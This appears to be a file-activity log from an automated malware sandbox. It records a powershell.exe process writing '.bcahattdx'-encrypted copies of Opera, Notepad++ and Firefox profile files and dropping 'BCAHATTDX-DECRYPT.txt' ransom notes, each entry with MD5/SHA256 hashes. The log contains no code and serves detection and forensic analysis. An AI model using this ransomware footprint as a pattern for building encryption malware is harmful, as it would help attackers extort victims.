MD5: b10d5cb555439c4cdc27426bfc207c44
SHA256: 6905f730367da71d731d2bb0b68c3c9be767c926514f821029fafeff07595dad
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat.bcahattdx
gpg
MD5: a4b81ec7e37d0bda4e241edc57760893
SHA256: e56e47cbdbe10bdd1c24d78ee9a2f87e2a395549688fdfb6388b8c51d5427aff
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini.bcahattdx
bs
MD5: 51ce8a060177944dfcb1775136ad3d8b
SHA256: b662bc075b81cd84eb337a1c0228145736bdeed46ccf6cbb640544d86a24ad08
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat.bcahattdx
binary
MD5: 60cbfe8bb5348c72cbf3c3d7cf479b9d
SHA256: c778d24208232940fa6040c39253904c4f1e0d9dc725aeb03f0c854bc15be22e
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat.bcahattdx
binary
MD5: 300418f02aaf8d6ee01aa761284af89a
SHA256: c13d49b76acc0673914cd13db3a5abca95adeb3ae4bd44ac93edd1d78f9b0c87
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat.bcahattdx
binary
MD5: 2e6ea69e7776e1deacec0b762bdda544
SHA256: 350a191201612d0887be7dde2cedb535e780c9d63616bc3844211584a5d43750
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr.bcahattdx
binary
MD5: a89abac146afbf086cb3ef212baade52
SHA256: f25a56a1144a6ef8443a1ef97b06c1d84c27692bc105c6263239d9d4e884c7d8
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml.bcahattdx
binary
MD5: 6ea1adc11cb507df7903981c40a98243
SHA256: 4ac8396f2f50a5c5f4d37c300ad9d66e24f7ab5c28c83eda3fe59ecd997bd4ca
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml.bcahattdx
binary
MD5: af8d7f6ad06583166d4c06e1997de51e
SHA256: 9b53166557b6d43a846edb6255b1dd9c66a0660766432c43f9d2da7822b1c173
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml.bcahattdx
binary
MD5: f4c618155779e25ae991c51d497faf58
SHA256: ab88bfdd0b7d1ca72563ddb351e1e2d1a82ef4e25758f884fa1870fdf4bfe533
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml.bcahattdx
binary
MD5: fbb3e3a4128117e95de7fcd4d6a8045a
SHA256: e9e3ae9ebc077a79258d769591ac353e2f9d3e8887d4bc1a88274a96121e1aa1
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml.bcahattdx
binary
MD5: ce4c5bcdd2fb92560c1e3c7c10b8e6be
SHA256: 0e3b74b6daeb85bb47f5bfaf7a53c3643c837eb09e19cc5b909781452a6ad624
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml.bcahattdx
binary
MD5: 53903f89145301ada35831111958b933
SHA256: 9620864e250ae18dfcc56e05d51cb875e6b55adc8bac6f19a1838949b89578d3
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml.bcahattdx
binary
MD5: 6bd427e2e1e08d71ca5059ba14d97eee
SHA256: 6cd5dcb81a1b3db5089428cda80547d981446a72d12e8500ac597d45b4b0843d
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml.bcahattdx
binary
MD5: e36725ff68680bacf8bcc55745e020d3
SHA256: dee6e4d1d33fc7c2e4a4e9b2f0d4663a67c0ef45961a62ff3a5e61069e68d316
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml.bcahattdx
binary
MD5: fa3ae5fe4c6566ef61d2f1d4edbaba57
SHA256: 7f7bc40bb44099fd9d7b78310bcee0244bfd03aa2af3c21cf631d0241353a4d1
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml.bcahattdx
binary
MD5: 27382349c92b2a362e2c51e5c2123f10
SHA256: c45c5d2bd7c3b1299d67f411d80bb73e13b0612a5a5f3ec9b3b0af4e8a263e31
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml.bcahattdx
binary
MD5: 256a2cb62ec2465e2a12933cac2cb373
SHA256: 059b76687296b96a909b829efbfa8c8090105c9f43c46e56a4a944d60f8f086b
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml.bcahattdx
binary
MD5: 138b3676e838ed2beb1b2f417b04a499
SHA256: a0317253cfb3cd32ee52290623d7e2f0150cf74be471308f6cb0790f41237c6d
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml.bcahattdx
binary
MD5: 81c0b7169254471848376b4dac28ce28
SHA256: 999756805286afffbbbc9a1e9a7b6961eef3dd973d55af25a1bb5afe9cc8233e
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml.bcahattdx
binary
MD5: 47b1fd7a357ff94ae0a5e58cf5353eaf
SHA256: 54f9cd6ebd32eeb110d7868e711f77da3e5b8070f6651fc2cd759e1d8a0167c8
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml.bcahattdx
binary
MD5: d400a7e0149ee17aa4c614669c43ddeb
SHA256: 6a0ab6eec5343104863530acae6aba57b4e4ac304f863a1f8c4a90a60d950ef5
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml.bcahattdx
binary
MD5: c5b7594f2f72d389de214f79295c9dbe
SHA256: da9f7506d5ec2cbc00c15d04f5b80a2854c18dc1dab383b882eb8fc1382ee9ce
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml.bcahattdx
binary
MD5: 59633fc67f22c4ea31e0b057f9626c9d
SHA256: b11e27a7d35baaee98a6c7fdfe65aa9337527b2c152ff9b23fc066b209fbfdec
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml.bcahattdx
binary
MD5: 99fdbe570017ebd6dcc9e7b0204a60e0
SHA256: 03917fdc8674823b210412c6a981db78973f181fea4cf07680613390fdc42109
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml.bcahattdx
binary
MD5: 2241dd70db95f64c0c2276418a60f452
SHA256: e5257e95dec820fa8bbc9751333d623c33496a72c0cd4b558e122c253faec3fe
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml.bcahattdx
binary
MD5: b462323990d46b6579c63a5e00910f1d
SHA256: a15f84191dcecde70cd434ad3fb78fb514595585f5e1dddc26b3981532953e98
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml.bcahattdx
binary
MD5: d76dc19ef82ac82c789bcb95553d083f
SHA256: df6dd1b5e0bd08dd938c92f634ae57676480afcdd3ad036c80bbe9c73dfad6fc
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml.bcahattdx
binary
MD5: ec5afb37090f20d759ae648f832fc49e
SHA256: 8e35ca55bd5a2a3c0ff357d5358542f1fc7ff9132e3949ffadb6a3ede0107f70
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini.bcahattdx
binary
MD5: d4b0b6c956dba27ea33b66f4f5eb9318
SHA256: 513e454e70df760c2077d28202a51823647e288c1cd148c1b2a92fff65f505dd
672
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\SystemExtensionsDev\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json.bcahattdx
binary
MD5: a0e64dfe75d18b0bdbb827d3df72a66a
SHA256: d1b4a15634a13bde7b0bc207778a314b2d34faf8dd677744e7afbfe63700d285
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite.bcahattdx
binary
MD5: 027327ddfacf0831d1c7e80861df772a
SHA256: 41e3628147f9caba7d58c1e7bff470e01a73ec55378c06ad7f18719e009941a9
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json.bcahattdx
binary
MD5: 5ed8409de32e186616fd03a3f18e1b9e
SHA256: 8c972355c6a5c2166666ddd7fa4cdab272a08dd61accbd102876c42229c0d3a9
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json.bcahattdx
binary
MD5: 579aa3037624e0808e668eaeeb562ce8
SHA256: 4c1493933f9ff3afa38a055fe463dc4d005eb659d727d9da11837672151680d8
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json.bcahattdx
binary
MD5: 7e356f4ce7b1493eff287aaa6e282529
SHA256: 8297483a2b35f4b75c228032b61486ba38ecd5825bd3bb8fc5b00476f56592f1
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite.bcahattdx
flc
MD5: cb40e7312fbaf7b1cc6695bd87c5e064
SHA256: 8b3ae375e5967c2b4ee401a495c7236f82b2c30b42591dec978db1d032376861
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\temporary\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite.bcahattdx
binary
MD5: 84bb9e31fc2b901fcebb6c91e00edfbb
SHA256: fc60ab29d8c80d78764d7cdef04f20686e742291ee09f27327f5c9fe7b5334aa
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite.bcahattdx
binary
MD5: b69ce3d731a9323108e1a14e102e30db
SHA256: 3ac1cca47f9d37676d2db85fc3d69cb6c1dbd2c965d44d437820ac0e4937db57
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.files\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.bcahattdx
binary
MD5: d6f31c199ba731b3fed6ea7e85dc91b8
SHA256: f4976aa040fa798df7b572d915f652d9dcd4652bc790624002e57ada0ab3808b
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.files\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite.bcahattdx
binary
MD5: b48718f5e00a314a495df09fb29cced1
SHA256: 3fc3f742b71c242e2a0311ede68cd52d37155998200d55bf25203f3ec6978b41
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.files\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.files\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.bcahattdx
binary
MD5: 756ef8c95a9b3446ae9fa8f7aa8b2d85
SHA256: 7afbe2f365e66be29facadf34ffcc5317feababe4a89907a4e1844bbb846f2bc
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite.bcahattdx
binary
MD5: ef2ff4710497893ac7646c0fc4a77eff
SHA256: 1bff0e64db7da059ba1c46211f6f685ab0a07b5a9e8d0163ef76a204530891c2
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.files\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite.bcahattdx
binary
MD5: e73391d9a1b998b547b8b73871a8a26b
SHA256: ec0c44bb6310f415a088f349fb481c7fccfbc4d8243949c4ca737eee1e04df7b
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.files\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite.bcahattdx
binary
MD5: 88b44c60211316641e5455149f309c3e
SHA256: f040dfaff31e56bee3f4209cd292bec5d419f3211e366ce5447557eeaece61b5
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat
dat
MD5: d7a950fefd60dbaa01df2d85fefb3862
SHA256: 75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite.bcahattdx
binary
MD5: add2cee36bf2a22b44acd4443374beb7
SHA256: 3c544794347ea192e41810324f9c5be3b95e4be049b52685acf330eac1e0e1c4
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata.bcahattdx
binary
MD5: 790c1650a588b2a3fe4a6546e07a4967
SHA256: f597a8410246d58a7087e90fae6685b263c41534ed1f423c01e654a316c2cb21
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2.bcahattdx
binary
MD5: 7f25ceea25782cf296ad0d6100fd25bf
SHA256: 33b95244f15d8451a6e2f92388c3305e129fe1bce835ab2e036b2101750946bb
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.files\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.sqlite.bcahattdx
binary
MD5: 8a83702c6614db48f1c5c7d3c38c53a2
SHA256: d28bf4ec014fa0991f26453cfb3efc49913b7dd84e25d09be70d654a93830db9
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\journals\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\1.bcahattdx
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\1
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata-v2.bcahattdx
binary
MD5: 20a48ce02597415e83516d4439a22c4e
SHA256: 5ebbbd5b4c0dee55226528592247e5e11d400ac15d53eefb742ce3e5a6aef7eb
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata-v2
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
